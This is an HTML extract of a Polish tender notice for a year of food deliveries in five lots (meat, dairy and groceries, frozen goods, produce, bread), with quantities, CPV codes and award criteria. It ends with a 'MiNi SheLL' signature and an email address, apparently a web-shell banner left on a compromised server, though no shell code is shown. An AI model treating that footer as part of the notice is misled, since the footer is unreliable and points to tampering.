                <b>Nazwa: </b>Dostawa produktów zwierzęcych, mięsa i przetworów mięsnych                                           (mięso wieprzowe), mięsa i podrobów drobiowych.             <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>

1	Boczek wieprzowy wędzony, parzony	Kg	40
2	Kiełbasa śląska gruboziarnista typ MORLINY lub równoważny	Kg	150
3	Kiełbasa szynkowa wieprzowa /nie mniej niż  80% mięsa bez konserwantów/	Kg	100
4	Polędwica sopocka /mięsa nie mniej niż 80%/	Kg	50
5	Szynka drobiowa/mięsa nie mniej niż 80%/	Kg	100
6	Szynka drobiowa z indyka/mięsa nie mniej niż 90% z całego kawałka/	Kg	100
7	Łopatka b/k	Kg	400
8	Schab b/k	Kg	200
9	Szynka b /k, kulka	Kg	200
10	Karczek b/k	Kg	300
11	Polędwica wieprzowa surowa	Kg	250
12	Wołowina extra b/k	Kg	70
13	Porcje rosołowe z kurczaka	Kg	100
14	Filet z kurczaka	Kg	200
15	Filet z indyka	Kg	300
16	Udko z kurczaka wędzone	Kg	20
17	Udka z kurczaka surowe	Kg	400
18	Cielęcina b/k	Kg	50
19	Parówki drobiowe 90% mięsa	Kg	260
20	Parówki cielęce 90% mięsa	Kg	150
21	Kiełbasa krakowska parzona 80% mięsa	Kg	100
22	Wątróbka drobiowa z kurczaka	Kg	70
23	Szynka 80% mięsa - gotowana 	Kg	100
24	Kości wieprzowe pokryte częściowo mięsem	Kg	250
25	Szynka konserwowa  80 % mięsa typ KRAKUS lub równoważna	Kg	50
26	Pasztet z indyka pieczony w foremce	Kg	130
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15100000-9, 15131135-0,
                    15131310-1,
                    15131410-2,
                    15111100-0,
                    15112000-6,
                    15112300-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin dostawy</td><td>20</td></tr><tr><td>nazwy handlowe oferowanego produktu (pochodzenie)</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Dostawa produktów mleczarskich, oleju, produktów przemiału                        ziarna, owoców, warzyw i podobnych produktów przetworzonych,                                                           różnych produktów spożywczych        <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1	Mleko krowie UHT 3,2 % tłuszczu w kartonie	szt	1000
2	Mleko krowie świeże w butelce 3,2 %	szt	3870
3	Masło extra min.80 % tłuszczu zwierzęcego,  kostka 200g	szt	2500
4	Twaróg półtłusty z mleka krowiego op. folia, bez konserwantów	kg	350
5	Dżem truskawkowy z kawałkami owoców  nisko słodzony  z dużą zawartością owoców bez dodatku cukru zagęszczony sokiem z jabłkiem,op.280g	szt	150

6	Dżem wiśniowy z kawałkami owoców  niskosłodzony  z dużą zawartością owoców bez dodatku cukru zagęszczony sokiem z jabłek,op.280g	szt	150

7	Dżem morelowy niskosłodzony z dużą zawartością owoców bez dodatku cukru słodzony sokiem z jabłek op.280g	szt	100
8	Dżem z brzoskwiniowy niskosłodzony z dużą zawartością owoców bez dodatku cukru zagęszczony sokiem z jabłek, op.280g	szt	150

9	Śmietana UHT 18% tłuszczu 400 ml	szt	400
10	Ser żółty z dziurami GOUDA skład:  mleko krowie, tłuszcz mleczny, podpuszczka, kultury bakterii, sól bez sztucznych barwników i konserwantów typ ŁOWICZ lub równoważny	kg	110

11	Śmietana  30% tłuszczu o,5 l kremówka	szt	320
11	Ser topiony trójkąty bez dodatku tłuszczy roślinnych typ HOCHLAND lub równoważny	szt	150
12	Twaróg  mielony naturalny 1 kg bez konserwantów typ PIĄTNICA lub równoważny	szt	300
13	Serek wiejski gruboziarnisty: skład twaróg ziarnisty, śmietanka, sól w opak. po 150g typ PIĄTNICA lub równoważny	szt	700
14	Serek  almette  op. 150g bez konserwantów, barwników oraz zagęszczaczy typ HOCHLAND lub równoważny	szt	200
15	Serek plastry 54%,  woda, mleko krowie odtłuszczone ,sól, dodatki naturalne	szt	1200
16	Makrela w oleju 170g słkad:55% ryba,sól,pieprz,olej,chili,skrobia,sól	szt	100
17	Jogurt naturalny op. 1 kg  skład: mleko, żywe kultury bakterii typ BAKOMA lub równoważny	szt	1000
18	Jogurt owocowy op. 125g,skład:mleko pasteryzowane, wsad owoców 20% , , bez konserwantów  i substancji zagęszczających, zakwaszany sokiem z cytryny, żywe kultury bakterii, typ PIĄTNICA lub równoważny	szt	6720

19	 Słonecznik łuskany 70g 	szt	50
20	Drożdże piekarskie op. 10g, naturalne	szt	40
21	Olej rzepakowy op. 5 l tłoczony na zimno z pierwszego tłoczenia	szt	100
22	Kasza jęczmienna perłowa	szt	60
23	Kasza gryczana	kg	50
24	Mąka typ 500 wrocławska, jasna	kg	180
25	Mąka tortowa typ 450, wysoki stopień przemiału, śnieżnobiały kolor,82%zawartości ziarna pszenicy	szt
	150
26	Mąka ziemniaczana op. 0,5 kg	szt	30	
27	Ryż typ SONKO  lub równoważny1 kg 	szt	100	
28	Płatki kukurydziane na mleko, op. 1kg bez konserwantów i b/c	szt	80	
29	Kasza manna op.1 kg	szt	20	
30	Kaszka Kus -Kus op. kg	szt	30
31	Przyprawa sucha naturalna do zup z zawartością mieszanek ziół, soli bez ulepszaczy op.1 kg	kg	20
32	Płatki jęczmienne op.1 kg	szt	20
33	Wafle ryżowe z prażonego ryżu, op.130g naturalne	szt	1400

34	Kulki miodowe zbożowe op.1 kg	szt	50
35	Musli mieszanka zbożowa z suszonymi owocami op.1 kg	szt	40
36	Płatki  owsiane z kiełkami z błonnikiem lnianym , op.1kg	szt	40
37	sok malinowy 1l zagęszczony o ekstrakcie ogólnym 65%/cukier, woda, zagęszczony sok malinowy,naturalna kwasowość/	szt	150

38	Ciastka orkiszowe 100g bez konserwantów	szt	100
39	Ogórek konserwowy	szt	20
40	Groszek konserwowy zielony, puszka 240-300g,kolor zielony, soczysty, ziarna całe, niezepsute, bez obcych zapachów w naturalnej zalewie	szt	70
41	Szczaw konserwowy, bez włókien,op. 280-380 g. w naturalnej zalewie	szt	20
43	Sok pomarańczowy bez konserwantów na bazie naturalnych soków 100%, op.1l	szt	335

44	Sok jabłkowy bez konserwantów na bazie soku naturalnego 100% , op.1l	szt	335

45	Koncentrat pomidorowy 30% konsystencja gęsta , skład:  białko, tłuszcz, pomidory 200 g słoik typ PUDLISZKI lub równoważny	szt	270

46	Kukurydza w puszce, ziarna całe, zalewa własna, smak i zapach charakterystyczny dla kukurydzy,	szt	30

47	Cukier trzcinowy drobnomielony, op. 1 kg	kg	50
48	Kakao naturalne  150g typ WEDEL lub równoważny	szt	20
49	Kakao rozpuszczalne Puchatek 300g	szt	20
50	Herbaty owocowe: malina,dzika róża itp. op. a25 szt	szt	10
51	Kawa zbożowa 500g	szt	20
52	Sos pieczeniowy ciemny typ WINIARY lub równoważny	szt	100
53	Ciasteczka owsiane fit 120g bez dodatku cukru oraz substancji słodzących	szt	2600

54	Woda mineralna , naturalnie lekko gazowana 1,5	szt	100
55	Zioła prowansalskie 10g	szt	200

56	Kasza kukurydziana	kg	15

57	Margaryna palma 250g	szt	50

58	Herbata   expresowa op. a50 szt saszetki, typ LIPTON lub równoważna	szt	40

59	Kompot wiśniowy 0,9l skład:  woda, 39% owoców	szt	300
60	Kompot czereśniowy 0,9l skład:woda,39% owoców	szt	300
61	Kompot truskawkowy 0,9lskład:woda, 39% owoców	Szt 	300
62	Cukier biały kryształ op. 1kg	szt	150
63	Cukier waniliowy	szt	50
64	Cukier puder op.0, 50 kg	szt	20
65	Groch 1 kg połówki	szt	30
66	Fasola Jaś 	szt	30
67	Jajka KL A rozmiar L, ściółkowe lub z wolnego wybiegu 	SZT	8000
68	Kwasek cytrynowy 2 0g	szt	100
69	Makaron świderki 2-4 jajeczny ,100% semoliny poch . pszenicy bez dodatków i ulepszaczy	szt	60

70	Rodzynki sułtanki 100g 	szt	50
71	Makaron zacierka babuni dodatków i ulepszaczy Makaron kokardka4 jajeczny ,100% semoliny poch z prze pszenicy bez ulepszaczy 250g typ MALMA, LUBELLA  lub równoważny	szt	250
72	 Makaron łazanka dodatków i ulepszaczy Makaron kokardka 4 jajeczny ,100% semoliny poch z prze. pszenicy bez ulepszaczy 1kg typ MALMA, LUBELLA  lub równoważny	szt	70
73	Makaron nitki do rosołu dodatków i ulepszaczy Makaron kokardka 4 jajeczny ,100% semoliny poch z prze pszenicy bez ulepszaczy 1kg typ MALMA, LUBELLA  lub równoważny	szt	120

74	Makaron  rurka bez dodatków i ulepszaczy 4 jajeczny ,100% semoliny poch z prze pszenicy bez ulepszaczy 1 kg typ MALMA, LUBELLA  lub równoważny	szt	10

75	Makaron spaghetti bez dodatków i ulepszaczy 4 jajeczny ,100% semoliny poch z prze pszenicy bez ulepszaczy 1 kg typ MALMA, LUBELLA  lub równoważny	szt	70

76	Majeranek suszony op.10g	szt	50
77	Majonez dekoracyjny 400g słoik ,skład; olej, żółtka jaja,ocet musztarda,kwasek cytrynowy, bez konserwantów	szt	50

78	Budyń śmietankowy 60g,skład:cukier,skrobia ziemniaczana,skrobia kukurydzy, aromat, barwnik,ikurkumina,karoten	szt	400

79	Ziele angielskie 90g-100g typ PRYMAT lub równoważny	szt	10
80	Liść laurowy 40-50g typ PRYMAT lub równoważny	szt	10
81	Papryka słodka 80-120g,skład: bez dodatku konserwantów,glutaminianu sodu,barwników typ PRYMAT lub równoważny	szt	100

82	Galaretka   typ WINIARY lub równowazny71g skład;cukier,żelatyna wieprzowa,kwas cytrynowy,aromat,barwnik /kurkumina/	szt	450

83	Kisiel bez cukru i sztucznych barwników	szt	450
84	Serek homogenizowany naturalny lub owocowy odtłuszczony twaróg, śmietanka lub mleko, kultury bakterii, podpuszczka, konsystencja puszysta 	szt	6 72

85	Cząber typ PRYMAT lub równoważny	szt	50
86	Kminek 0,1 typ PRYMAT lub równoważny	szt	20
87	Rozmaryn 0,15g typ PRYMAT lub równoważny	szt	20
88	Bazylia typ PRYMAT lub równoważny	szt	20
89	Tymianek suszony typ PRYMAT lub równoważny	szt	20
90	Oregano suszone typ PRYMAT lub równoważny	szt	10
91	Jałowiec suszony typ PRYMAT lub równoważny	szt	10
92	Estragon suszony0,15g typ PRYMAT lub równoważny	szt	10
93	Chili papryka suszona, mielona 0,2 typ PRYMAT lub równoważny	szt	5
94	Pieprz ziołowy suszony, ziarna typ PRYMAT lub równoważny	szt	50
95	Przyprawa do kurczaka mielona 20g skład;mieszanka curry,papryka słodka,chili,czosnek,imbir,pieprz czarny,sól	szt	80

96	Sól morska Vita 1 kg	kg	80
97	 Sos neapolitański 0,049 kg skład; bez konserwantów, glutaminianu sodu, barwników, w środku pomidory, oregano, tymianek,oliwa z oliwek typu Winiary, Knorr, Hugli lub równoważny               		100

98	Biały barszcz zakwas, żurek zakwas , butelka 500ml	szt	200
99	Śledź w pomidorach 170g skład: śledź, przecier pomidorowy, przyprawy naturalne,	Szt	100
100	Makrela w pomidorach skład makrela, przecier pomidorowy, przyprawy naturalne,	Szt	100

101	Przyprawa do gyrosa typ PRYMAT lub równoważny	Szt	25

102	Pieprz czarny mielony	typ PRYMAT lub równoważny	Szt	100
	
103	Morele suszone	Kg	10

104	Cynamon typ PRYMAT lub równoważny
	Szt	10
105	Brzoskwinie całe w syropie, w  puszce 850g skład;brzoskwinia,woda,cukier,syrop glukozowo-fruktozowy,regulator kwasowości  kwas cytrynowy
	Szt	25
106	Ananas plastry w puszce 850gskład;ananas,woda,cukier,syrop glukozowo-fruktozowy,regulator kwasowości-kwas cytrynowy	Szt	25


107	Oliwa z oliwek op. 1 l	Szt	10

108	Czosnek granulowany typ PRYMAT lub równoważny	Szt	50

110	Czekolada mleczna typ.Milka lub równoważny 100g	szt	280

111	Grzanki ziołowe 0,40g	Szt	30
112	Wafle podpłomyk bez cukru,środków konserwujących,sztucznych barwników 72g 	Szt	680
113	Miód wielokwatowy naturalny	Kg	70

114	Chrupki kukurydziane naturalne 400g skład; maką kukurydziana, woda	Szt	200

115	Soczki owocowe z rurką mały; skład;  100% soku z owoców bez cukru i konserwantów typ CYMES lub równoważny	Szt	6720
116	Orzechy włoskie	Kg	3

117	Lubczyk suszony 0,5 typ PRYMAT lub równoważny	Kg	20

118	Ketchup  ,  pomidory, przyprawy naturalne KOTLIN bez konserwantów 0,5 l dla dzieci	Szt	60


<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15511210-8, 15512000-0,
                    15512200-2,
                    15530000-2,
                    15540000-5,
                    15551300-8,
                    15411100-3,
                    15431100-9,
                    15891400-4,
                    15897200-4,
                    15898000-9,
                    03111700-9,
                    03110000-5,
                    03221210-1,
                    15864100-3,
                    15831200-4,
                    15833100-7,
                    15811200-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin dostawy</td><td>0</td></tr><tr><td>nazwy handlowe oferowanego produktu (pochodzenie)</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Dostawa mrożonek: ryb  mrożonych, mrożonych warzyw i owoców                          oraz innych produktów głęboko mrożonych                     <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>   1	Filet z dorsza SHP bez glazury, bez skóry	Kg	450
   2	Mieszanka kompotowa-mix owoców	Kg	100
   3	Truskawki całe 	Kg	300
   4	Marchewka kostka	Kg	50
   5	Kalafior, różyczki	Kg	100
   6	Fasolka szparagowa	Kg	60
	7	Brokuł , różyczki typ Hortex lub równoważny	Kg	70
	8	Mieszanka warzywna 8 skł	Kg	100
	9	Groszek zielony	Kg	30
 	10	Szpinak  mielony	Kg	10
	11	Warzywa królewskie /cząstki warzyw/	Kg	150
	12	Włoszczyzna krojona paski	Kg	150
	13	Brukselka	Kg	10
	14	Jagody całe	Kg	15
	15	Maliny całe	Kg	15
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15220000-6, 15331170-9,
                    15896000-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin dostawy</td><td>20</td></tr><tr><td>nazwy handlowe oferowanego produktu (pochodzenie)</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>Dostawa owoców, warzyw i podobnych produktów                     <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1	Buraki czerwone	kg	150
2	Cebula	kg	100
3	Cytryna	kg	60
5	Czosnek polski w główkach 	kg	 30
6	Kapusta czerwona w główkach	kg	150
7	Kapusta pekińska	kg	150
8	Kapusta biała w głowach	kg	120
9	Kapusta biała młoda od 10.czerwca	gł	50
10	Kapusta kiszona (nie zakwaszana)	kg	100
11	Ogórek kiszony (nie zakwaszany)	kg	70
12	Sałata zielona	szt	200
13	Rzodkiewka czerwona	p	150
14	Szczypiorek zielony	p	220
15	Natka pietruszki -zielona	p	600
16	Koper zielony	p	400
17	Ziemniaki	kg	3500
18	Ziemniaki młode od 15 maja	kg	1100
19	Marchewka	kg	400
20	Pietruszka korzeń	kg	50
21	Seler	kg	40
22	Pora	szt	100
23	Kabaczki	kg	30
24	Pomidory	kg	250
25	Ogórek szklarniowy	kg	250
26	Papryka czerwona	kg	50
27	Papryka zielona	kg	40
28	Papryka żółta	kg	40
29	Pieczarki	kg	50
30	Banany	kg	1000
31	Pomarańcze	kg	700
32	Mandarynki	kg	600
33	Truskawki 	kg	200
34	Jabłka	Kg	1600
35	Gruszki polskie	Kg	300
36	Brzoskwinie	kg	200
37	Nektaryny	Kg	250
38	Sałata lodowa	szt	30
	39	Arbuz	kg	100
40	Kiwi	kg	    20
	Winogron zielony	Kg	100
	Winogron czerwony	Kg	100

<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15300000-1, 03200000-3<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin dostawy</td><td>20</td></tr><tr><td>nazwy handlowe oferowanego produktu (pochodzenie)</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>5
                  
                <b>Nazwa: </b>Dostawa świeżego pieczywa i wyrobów cukierniczych                    <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1	chleb z  ziarnami słonecznika, płatków owsianych, skład; mąka, woda, drożdże ,waga 0,6 kg                        	     szt          	734
			18	378
2	 chleb razowy ze słonecznikiem, kminkiem, siemię lnianym na drożdżach, mąka pszenna, ekstrat słodu , waga 0,6 kg	      szt	250
 			3	63
3	Chleb pszenno-żytni skład; mąka żytnia, ziemniaczana, woda  ,tłuszcz roślinny, cukier, sól, drożdże, mleko odtłuszczone, sól 0,55 kg	      szt	250
     			1620	
4	Chleb żytni  skład; mąka żytnia, woda, drożdże, słonecznik, ekstrat słodu, woda, tłuszcz roślinny, sól, woda 0,7kg	      szt	250
 				  239
5	Bułka pszenna skład: mąka pszenna, tłuszcz, cukier, woda, drożdże, sól	      szt	7 500				1190
6	Bułka  grahamka  skład; mąka graham,  mąka pszenna, drożdże, sól 0,05	      szt	500				2 100
7	Bułka z ziarnami słonecznika, dyni, siemienia lnianego ,płatków owsianych  0,05 kg	      szt	5000				2 590
8	Bułka  maślana skład; białko, tłuszcz, mąka 0,05 dkg	      szt	5000				2 035
9	Rogaliki krucho-drożdżowe wszystkie składniki naturalne, jaja świeże	      kg	150				3 228
10	Rogal maślany  skład; mąka pszenna, woda, cukier, margaryna, drożdże, sól, mak 0,05 dkg	      szt	5 000
   				2 450
11	Bułka tarta, pszenna jasna 0,5 kg	      szt	100				2 450
12	Babka jogurtowo-maślana wszystkie składniki naturalne, jaja świeże	      kg	60				2 430
13	Drożdżówki z serem lub owocami skład; mąka,  pełnoziarnista lub pszenna,  masło, drożdże, cukier , świeże jaja ,mleko,  woda	szt	3 417				
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15810000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>trmin dostawy</td><td>20</td></tr><tr><td>nazwy handlowe oferowanego produktu (pochodzenie)</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com